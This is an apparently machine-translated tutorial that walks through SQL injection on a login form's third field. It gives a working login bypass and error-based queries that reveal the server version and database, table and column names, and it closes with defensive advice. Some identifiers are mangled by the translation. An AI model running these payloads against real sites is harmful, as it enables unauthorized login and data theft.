In-depth analysis of the whole process of SQL injection, and in-depth analysis of the whole process of SQL

In-depth analysis of the whole process of SQL injection, and in-depth analysis of the whole process of SQL

This article analyzes the whole process of SQL injection. We will share this with you for your reference. The details are as follows:

Initial injection-bypass verification and log on directly

The company website login box is as follows:

In addition to the account and password, you can see that there is also an input box for the company name. According to the input box, it is not difficult to introduce the SQL statement as follows:
Copy codeThe Code is as follows: SELECT * From Table WHERE Name = 'xx' and Password = 'yy' and Corp = 'zz'

I found that both of the previous checks were performed, but the third input box was neglected. The vulnerability is here! The injection starts. Enter the following content in the input box:

If the username is entered incorrectly and the password is left blank, you can click the logon button to log on successfully.

Let's take a look at the final SQL statement to find the cause:
Copy codeThe Code is as follows: SELECT * From Table WHERE Name = 'SQL object' and Password = ''and Corp ='' or 1 = 1 --'

From the code, we can see that the first half of the single quotes are closed, and the last half of the single quotes are commented out by "--". There is a permanent condition "1 = 1" in the middle ", this results in the successful login of any character. The harm of SQL injection is not just anonymous logon.

Intermediate injection-get information with exceptions

Now we write in the third input box:

‘or 1=(SELECT @@version) –

As follows:

The background SQL becomes like this:

SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp=''or 1=(SELECT @@VERSION)--'

The judgment condition is changed to 1 = (SELECT @ VERSION ),

This statement will certainly lead to errors, but errors are exactly what we want. After you click log on, the following information is displayed:

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (SP3)-10.0.5500.0 (X64) Sep 21 2011 22:45:45
Copyright (c) 1988-2008 Microsoft Corporation Developer Edition (64-bit)
On Windows NT 6.1 <X64> (Build 7601: Service Pack 1) 'to data type int.

The terrible thing is that the operating system and SQL Server version information of the Server are displayed by mistake.

Hazard expansion-retrieve all database names, table names, and field names of the server

Then, enter the following information in the input box:
Copy codeThe Code is as follows: t' or 1 = (SELECT top 1 name FROM master .. sysdatabases where name not in (SELECT top 0 name FROM master .. sysdatabases ))--

At this time, we can find that the third input box has a limit on the number of words. However, such client restrictions are also false,

It can be removed directly through the Google browser.

Click Log On. The returned information is as follows:

Conversion failed when converting the nvarchar value 'master' to data type int.

The database name "master" is displayed by exception! Change the sequence number in the preceding SQL statement in sequence,

The names of all databases on the server can be obtained.

Then, enter the following information:
Copy codeThe Code is as follows: B 'or 1 = (SELECT top 1 name FROM master .. sysobjects where xtype = 'U' and name not in (SELECT top 1 name FROM master .. sysobjects where xtype = 'U '))--

The returned information is as follows:

Conversion failed when converting the nvarchar value 'spt _ fallback_db 'to data type int.

We get the first table name in the master database: "spt_fallback_db ",

Same as above. Change the sequence number to obtain the names of all tables in the database.

Now we use the "spt_fallback_db" table as an example to try to get all the field names in the table. Enter the following code in the input box:
Copy codeThe Code is as follows: B 'or 1 = (SELECT top 1 master .. syscolumns. name FROM master .. syscolumns, master .. sysobjects WHERE master .. syscolumns. id = master .. sysobjects. id AND master .. sysobjects. name = 'spt _ fallback_db ');

The error message is as follows:

"Conversion failed when converting the nvarchar value 'xserver _ name' to data type int .";

In this way, the first field name "xserver_name" is displayed, and the sequence number is changed in sequence to traverse all the field names.

Ultimate Goal: Get data in the database

Here, we know that SQL injection can be used to obtain all databases, tables, and fields. To prevent this article from being completely an injection tutorial, the code for getting data will not be described, the purpose of this article has been achieved. What does SQL Injection mean? This means that all data in the database can be stolen.

Can someone ignore the SQL injection vulnerability after knowing this hazard?

Conclusion

For security, This article summarizes the following points:

1. Always be cautious with user input.
2. Only client verification equals no verification.
3. Never expose server error messages to users.

In addition, I would like to add a few points:

1. SQL injection can not only be achieved through the input box, but also through the Url.
2. In addition to the server error page, there are other ways to obtain database information.
3. You can use software to simulate injection. This method steals information much faster than you think.
4. The vulnerability has nothing to do with the language platform.